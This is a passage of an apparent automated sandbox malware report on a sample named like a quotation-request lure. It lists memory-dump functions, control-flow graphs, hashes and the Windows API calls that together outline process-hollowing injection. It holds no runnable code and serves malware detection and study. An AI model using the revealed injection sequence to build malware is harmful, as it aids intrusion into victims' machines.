                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                              • Opcode ID: b486ef06daf1c944f16fb0ed72787bac631c3f9b4c55e1ba6ed3c8f07a4bf489
                                                                                                                                              • Instruction ID: 6643981a920d45a22a839ce4d6be4f3d111d7b89fb6faaffd290c20c68b2b954
                                                                                                                                              • Opcode Fuzzy Hash: b486ef06daf1c944f16fb0ed72787bac631c3f9b4c55e1ba6ed3c8f07a4bf489
                                                                                                                                              • Instruction Fuzzy Hash: 1CA15A71D04219DFEB60DF68C841BEEBBB2FF48314F14856AD848A7280DB759A85CF91
                                                                                                                                              Function 06D0B1F0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2576 6d0b1f0-6d0b285 2578 6d0b287-6d0b291 2576->2578 2579 6d0b2be-6d0b2de 2576->2579 2578->2579 2580 6d0b293-6d0b295 2578->2580 2586 6d0b2e0-6d0b2ea 2579->2586 2587 6d0b317-6d0b346 2579->2587 2581 6d0b297-6d0b2a1 2580->2581 2582 6d0b2b8-6d0b2bb 2580->2582 2584 6d0b2a3 2581->2584 2585 6d0b2a5-6d0b2b4 2581->2585 2582->2579 2584->2585 2585->2585 2588 6d0b2b6 2585->2588 2586->2587 2589 6d0b2ec-6d0b2ee 2586->2589 2595 6d0b348-6d0b352 2587->2595 2596 6d0b37f-6d0b439 CreateProcessA 2587->2596 2588->2582 2590 6d0b2f0-6d0b2fa 2589->2590 2591 6d0b311-6d0b314 2589->2591 2593 6d0b2fc 2590->2593 2594 6d0b2fe-6d0b30d 2590->2594 2591->2587 2593->2594 2594->2594 2597 6d0b30f 2594->2597 2595->2596 2598 6d0b354-6d0b356 2595->2598 2607 6d0b442-6d0b4c8 2596->2607 2608 6d0b43b-6d0b441 2596->2608 2597->2591 2600 6d0b358-6d0b362 2598->2600 2601 6d0b379-6d0b37c 2598->2601 2602 6d0b364 2600->2602 2603 6d0b366-6d0b375 2600->2603 2601->2596 2602->2603 2603->2603 2605 6d0b377 2603->2605 2605->2601 2618 6d0b4d8-6d0b4dc 2607->2618 2619 6d0b4ca-6d0b4ce 2607->2619 2608->2607 2621 6d0b4ec-6d0b4f0 2618->2621 2622 6d0b4de-6d0b4e2 2618->2622 2619->2618 2620 6d0b4d0 2619->2620 2620->2618 2623 6d0b500-6d0b504 2621->2623 2624 6d0b4f2-6d0b4f6 2621->2624 2622->2621 2625 6d0b4e4 2622->2625 2627 6d0b516-6d0b51d 2623->2627 2628 6d0b506-6d0b50c 2623->2628 2624->2623 2626 6d0b4f8 2624->2626 2625->2621 2626->2623 2629 6d0b534 2627->2629 2630 6d0b51f-6d0b52e 2627->2630 2628->2627 2632 6d0b535 2629->2632 2630->2629 2632->2632
                                                                                                                                              APIs
                                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D0B426
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                              • Opcode ID: c2f02c25a2176c25206b390edce194aa0402012fd77465b4c12a5532185d9942
                                                                                                                                              • Instruction ID: 51d3ab2b4fb01a0997f5095f9fafd246645824de06863a33a1657ab627f2a608
                                                                                                                                              • Opcode Fuzzy Hash: c2f02c25a2176c25206b390edce194aa0402012fd77465b4c12a5532185d9942
                                                                                                                                              • Instruction Fuzzy Hash: 0E915A71D04319DFEB60DF69C841BEDBBB2FB48314F1485AAD808A7280DB759A85CF91
                                                                                                                                              Function 024DB261 Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2633 24db261-24db27f 2634 24db2ab-24db2af 2633->2634 2635 24db281-24db28e call 24d87b8 2633->2635 2636 24db2b1-24db2bb 2634->2636 2637 24db2c3-24db304 2634->2637 2642 24db2a4 2635->2642 2643 24db290 2635->2643 2636->2637 2644 24db306-24db30e 2637->2644 2645 24db311-24db31f 2637->2645 2642->2634 2688 24db296 call 24db4f8 2643->2688 2689 24db296 call 24db508 2643->2689 2644->2645 2646 24db321-24db326 2645->2646 2647 24db343-24db345 2645->2647 2651 24db328-24db32f call 24dac54 2646->2651 2652 24db331 2646->2652 2650 24db348-24db34f 2647->2650 2648 24db29c-24db29e 2648->2642 2649 24db3e0-24db4a0 2648->2649 2683 24db4a8-24db4d3 GetModuleHandleW 2649->2683 2684 24db4a2-24db4a5 2649->2684 2654 24db35c-24db363 2650->2654 2655 24db351-24db359 2650->2655 2653 24db333-24db341 2651->2653 2652->2653 2653->2650 2657 24db365-24db36d 2654->2657 2658 24db370-24db379 call 24dac64 2654->2658 2655->2654 2657->2658 2664 24db37b-24db383 2658->2664 2665 24db386-24db38b 2658->2665 2664->2665 2666 24db38d-24db394 2665->2666 2667 24db3a9-24db3ad 2665->2667 2666->2667 2669 24db396-24db3a6 call 24dac74 call 24dac84 2666->2669 2670 24db3b3-24db3b6 2667->2670 2669->2667 2673 24db3d9-24db3df 2670->2673 2674 24db3b8-24db3d6 2670->2674 2674->2673 2685 24db4dc-24db4f0 2683->2685 2686 24db4d5-24db4db 2683->2686 2684->2683 2686->2685 2688->2648 2689->2648
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 024DB4C6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1631854951.00000000024D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_24d0000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                              • Opcode ID: 72196212ec646f7ada41006239ffedee2f15d47f52e8df483c3cecef57c7bc8d
                                                                                                                                              • Instruction ID: 4345d10ff6421c3b62bd22a5426af237df8f4104967432f264452ca782dc3d46
                                                                                                                                              • Opcode Fuzzy Hash: 72196212ec646f7ada41006239ffedee2f15d47f52e8df483c3cecef57c7bc8d
                                                                                                                                              • Instruction Fuzzy Hash: 548123B0A00B058FDB24DF6AD55475ABBF2FF88608F00892ED48ADBB50D774E905CB91
                                                                                                                                              Function 024D590C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2690 24d590c-24d59d9 CreateActCtxA 2692 24d59db-24d59e1 2690->2692 2693 24d59e2-24d5a3c 2690->2693 2692->2693 2700 24d5a3e-24d5a41 2693->2700 2701 24d5a4b-24d5a4f 2693->2701 2700->2701 2702 24d5a51-24d5a5d 2701->2702 2703 24d5a60 2701->2703 2702->2703 2705 24d5a61 2703->2705 2705->2705
                                                                                                                                              APIs
                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 024D59C9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1631854951.00000000024D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_24d0000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Create
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                              • Opcode ID: e2250090314abbbe15c74d6128324dcef5970701b0f67aef9182c20d3be819e2
                                                                                                                                              • Instruction ID: f0485e9b128d79c6e656fa901ddb9bdf3739fb1ddcda6d81243a737c453911ae
                                                                                                                                              • Opcode Fuzzy Hash: e2250090314abbbe15c74d6128324dcef5970701b0f67aef9182c20d3be819e2
                                                                                                                                              • Instruction Fuzzy Hash: 5441E3B1D00729CFDB24DFAAC88479EBBF1BF88714F60816AD408AB251DB756949CF50
                                                                                                                                              Function 024D4514 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2706 24d4514-24d59d9 CreateActCtxA 2709 24d59db-24d59e1 2706->2709 2710 24d59e2-24d5a3c 2706->2710 2709->2710 2717 24d5a3e-24d5a41 2710->2717 2718 24d5a4b-24d5a4f 2710->2718 2717->2718 2719 24d5a51-24d5a5d 2718->2719 2720 24d5a60 2718->2720 2719->2720 2722 24d5a61 2720->2722 2722->2722
                                                                                                                                              APIs
                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 024D59C9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1631854951.00000000024D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_24d0000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Create
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                              • Opcode ID: 431ebf1f116a0db6f74dd2bcb12aa1729cb6e4ecea54301ebed41661272c9f50
                                                                                                                                              • Instruction ID: 9a3c27af08c206dee1bc08d1ef84922898689000cb4eeb8ff14cbd82dcf48339
                                                                                                                                              • Opcode Fuzzy Hash: 431ebf1f116a0db6f74dd2bcb12aa1729cb6e4ecea54301ebed41661272c9f50
                                                                                                                                              • Instruction Fuzzy Hash: 9C41E2B1D0072DCFEB24DFAAC84479EBBB1BF88704F60806AD408AB251DB756945CF90
                                                                                                                                              Function 07633F14 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2723 7633f14-7634fc4 2725 7634fc6-7634fcc 2723->2725 2726 7634fcf-7634fde 2723->2726 2725->2726 2727 7634fe3-763501c DrawTextExW 2726->2727 2728 7634fe0 2726->2728 2729 7635025-7635042 2727->2729 2730 763501e-7635024 2727->2730 2728->2727 2730->2729
                                                                                                                                              APIs
                                                                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07634F5D,?,?), ref: 0763500F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636874825.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7630000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DrawText
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2175133113-0
                                                                                                                                              • Opcode ID: 608b3d0510df46619243a7a92867934d5f843f00900fbbf713a534417a7aa91b
                                                                                                                                              • Instruction ID: 3b478d7acc374ec6095913f3517febdc7ca8f3671cad707bc57d734125fd9185
                                                                                                                                              • Opcode Fuzzy Hash: 608b3d0510df46619243a7a92867934d5f843f00900fbbf713a534417a7aa91b
                                                                                                                                              • Instruction Fuzzy Hash: E631E4B59003499FDB10CFAAD884AAEFBF5FB48310F14842EE915A7310D775A954CFA4
                                                                                                                                              Function 06D0AF61 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2733 6d0af61-6d0afb6 2736 6d0afc6-6d0b005 WriteProcessMemory 2733->2736 2737 6d0afb8-6d0afc4 2733->2737 2739 6d0b007-6d0b00d 2736->2739 2740 6d0b00e-6d0b03e 2736->2740 2737->2736 2739->2740
                                                                                                                                              APIs
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D0AFF8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                              • Opcode ID: 950ace9c286d2a81eff58239ecb37ce1fc2540f12c167034fec3165b694fd854
                                                                                                                                              • Instruction ID: 2ed58498e804148a5316857546b349581269e3408e35471d268780e15a2d224b
                                                                                                                                              • Opcode Fuzzy Hash: 950ace9c286d2a81eff58239ecb37ce1fc2540f12c167034fec3165b694fd854
                                                                                                                                              • Instruction Fuzzy Hash: 5E2146B19003499FDB50DFAAC881BDEBBF5FF48310F14882AE958A7241D7789944CBA0
                                                                                                                                              Function 07634F70 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2744 7634f70-7634fc4 2746 7634fc6-7634fcc 2744->2746 2747 7634fcf-7634fde 2744->2747 2746->2747 2748 7634fe3-763501c DrawTextExW 2747->2748 2749 7634fe0 2747->2749 2750 7635025-7635042 2748->2750 2751 763501e-7635024 2748->2751 2749->2748 2751->2750
                                                                                                                                              APIs
                                                                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07634F5D,?,?), ref: 0763500F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636874825.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7630000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DrawText
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2175133113-0
                                                                                                                                              • Opcode ID: 392db762e79d2078bf1662beb025392f3514e17ae9b0f950c0c4c3f9efb4f1e3
                                                                                                                                              • Instruction ID: 4ef687fad07a16a934467fb91aab2b277c461f7cfde1bd26ba1334bccfb36241
                                                                                                                                              • Opcode Fuzzy Hash: 392db762e79d2078bf1662beb025392f3514e17ae9b0f950c0c4c3f9efb4f1e3
                                                                                                                                              • Instruction Fuzzy Hash: 9C3102B59003499FDB10CFAAD884AAEFBF5FB48310F14842EE819A7311D775A944CFA0
                                                                                                                                              Function 06D0AF68 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2754 6d0af68-6d0afb6 2756 6d0afc6-6d0b005 WriteProcessMemory 2754->2756 2757 6d0afb8-6d0afc4 2754->2757 2759 6d0b007-6d0b00d 2756->2759 2760 6d0b00e-6d0b03e 2756->2760 2757->2756 2759->2760
                                                                                                                                              APIs
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D0AFF8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                              • Opcode ID: d495576bec3d43b233909699eeacff79d3e4e13d6822422daac923a823cb68d2
                                                                                                                                              • Instruction ID: bf3945347c2588cb2f243402e67c3a6663df4c1772c2ba36a6fc23836780bc1f
                                                                                                                                              • Opcode Fuzzy Hash: d495576bec3d43b233909699eeacff79d3e4e13d6822422daac923a823cb68d2
                                                                                                                                              • Instruction Fuzzy Hash: D42127B59003499FDF50DFAAC881BDEBBF5FF48310F14842AE919A7241D7789954CBA0
                                                                                                                                              Function 06D0A991 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2764 6d0a991-6d0a9e3 2767 6d0a9f3-6d0aa23 Wow64SetThreadContext 2764->2767 2768 6d0a9e5-6d0a9f1 2764->2768 2770 6d0aa25-6d0aa2b 2767->2770 2771 6d0aa2c-6d0aa5c 2767->2771 2768->2767 2770->2771
                                                                                                                                              APIs
                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D0AA16
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                              • Opcode ID: 1f9cf0ee6a92312b9efd494eaa2f2972e2809c8e7eef632337e9f6f8a67309b9
                                                                                                                                              • Instruction ID: 2f1c36aa11465051e649ae13096ca11872d1f6d4d9ecc6749b0b15ce3751dff0
                                                                                                                                              • Opcode Fuzzy Hash: 1f9cf0ee6a92312b9efd494eaa2f2972e2809c8e7eef632337e9f6f8a67309b9
                                                                                                                                              • Instruction Fuzzy Hash: 68213971D003099FDB50DFAAC885BEEFBF4EF48220F548429D459A7281C7789945CFA0
                                                                                                                                              Function 024DCDE0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2775 24dcde0-24dd7d4 DuplicateHandle 2777 24dd7dd-24dd7fa 2775->2777 2778 24dd7d6-24dd7dc 2775->2778 2778->2777
                                                                                                                                              APIs
                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,024DD706,?,?,?,?,?), ref: 024DD7C7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1631854951.00000000024D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_24d0000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                              • Opcode ID: 3a007f61e98fd83a29b06073c032bd381160df4ee19f96287e99d02d65e21d11
                                                                                                                                              • Instruction ID: 43c91e5fb66dc183308d04d69e071fc9f34821ae96eeec6cb3a07de9b7e16d6f
                                                                                                                                              • Opcode Fuzzy Hash: 3a007f61e98fd83a29b06073c032bd381160df4ee19f96287e99d02d65e21d11
                                                                                                                                              • Instruction Fuzzy Hash: 4921D4B5900349DFDB10CFAAD884AEEBBF4EB48610F14845AE914A3350D374A954CFA4
                                                                                                                                              Function 06D0B053 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D0B0D8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1726664587-0
                                                                                                                                              • Opcode ID: e051638efb710be7ca749dc7d8c0e060764772281f30118fa7c475727f5090f7
                                                                                                                                              • Instruction ID: d96ed1dfa6fb83d263f3278e84da7855c6da27ba98e675ff836f08251344554a
                                                                                                                                              • Opcode Fuzzy Hash: e051638efb710be7ca749dc7d8c0e060764772281f30118fa7c475727f5090f7
                                                                                                                                              • Instruction Fuzzy Hash: E2212875D003499FDB10DFAAC881BEEBBF5FF48310F50842AE958A7241C7799905DBA0
                                                                                                                                              Function 024DD738 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,024DD706,?,?,?,?,?), ref: 024DD7C7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1631854951.00000000024D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_24d0000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                              • Opcode ID: 747259a61335c2775653e322bc9dc2824fa6ca7a45582c00d5dc4d5f83512c25
                                                                                                                                              • Instruction ID: 5d38ea1f4c8eba189449b05d2e310828fa8e4e517e05e6d7d474e49f3f2ea44f
                                                                                                                                              • Opcode Fuzzy Hash: 747259a61335c2775653e322bc9dc2824fa6ca7a45582c00d5dc4d5f83512c25
                                                                                                                                              • Instruction Fuzzy Hash: 2921D2B5900349DFDB10CFAAD884ADEBBF4EB48610F14841AE958A7350D378A955CF61
                                                                                                                                              Function 06D0B058 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D0B0D8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1726664587-0
                                                                                                                                              • Opcode ID: 16a15b55fe5e4df07d1d218d614b880e335890afbddaf866f3ccccaf46277ebc
                                                                                                                                              • Instruction ID: 45e9fbeae33599c2c417946635f9d0202bf1bdeca861f3f6d78587ded39a478e
                                                                                                                                              • Opcode Fuzzy Hash: 16a15b55fe5e4df07d1d218d614b880e335890afbddaf866f3ccccaf46277ebc
                                                                                                                                              • Instruction Fuzzy Hash: 8C2116718003499FDB10DFAAC881BDEBBF5FF48310F50842AE918A7240C7799904CBA0
                                                                                                                                              Function 06D0A998 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D0AA16
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                              • Opcode ID: 0d0ae6240e31a0c02dbcf09694de899320b0a6db0590ab4fc60ba07b0622e92e
                                                                                                                                              • Instruction ID: 54ee3642f4b5c61d0d3fd0f16946f40562d4bb9c781a6a43e8fee7e69c084a29
                                                                                                                                              • Opcode Fuzzy Hash: 0d0ae6240e31a0c02dbcf09694de899320b0a6db0590ab4fc60ba07b0622e92e
                                                                                                                                              • Instruction Fuzzy Hash: 7E213871D003098FDB50DFAAC885BEEBBF4EF88220F548429D459A7281CB789944CFA0
                                                                                                                                              Function 06D0AEA0 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D0AF16
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                              • Opcode ID: b2b27b456c864dce071513d210c39a2b203275ff628734e288ed28ef639700da
                                                                                                                                              • Instruction ID: 80d2a2d126d8ce4981e15947eda86c86f42607b4bf87343717c459b171739ce4
                                                                                                                                              • Opcode Fuzzy Hash: b2b27b456c864dce071513d210c39a2b203275ff628734e288ed28ef639700da
                                                                                                                                              • Instruction Fuzzy Hash: 901136718003499FDB10DFAAC844BDEBBF5EF88320F148819E555A7250C775A941CFA0
                                                                                                                                              Function 06D0A8E1 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ResumeThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                              • Opcode ID: c9150824bb7d03a8472141cbede4f511ef398462fad8c89c994ee2158ac9bc1b
                                                                                                                                              • Instruction ID: 3c2261a300228a0fe650140593d877c4bc3fa74bd9f85f104c045921bffd31de
                                                                                                                                              • Opcode Fuzzy Hash: c9150824bb7d03a8472141cbede4f511ef398462fad8c89c994ee2158ac9bc1b
                                                                                                                                              • Instruction Fuzzy Hash: D91158719003498FDB20DFAAC8457DEFBF8EF88620F248819D559A7240CB756945CFA4
                                                                                                                                              Function 06D0AEA8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D0AF16
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                              • Opcode ID: 252f7b6b4ba34bfaa96a9b9cd509b54464633a1e3e03cf02f34fb3b41895ad8a
                                                                                                                                              • Instruction ID: f6d5129332ce8c5cd016052e097aa0e7abe55a6504427bcdbff529bbd40288d7
                                                                                                                                              • Opcode Fuzzy Hash: 252f7b6b4ba34bfaa96a9b9cd509b54464633a1e3e03cf02f34fb3b41895ad8a
                                                                                                                                              • Instruction Fuzzy Hash: E31126718003499FDB10DFAAC844BDEBBF9EF88720F148419E515A7250C775A954CFA0
                                                                                                                                              Function 06D0A8E8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
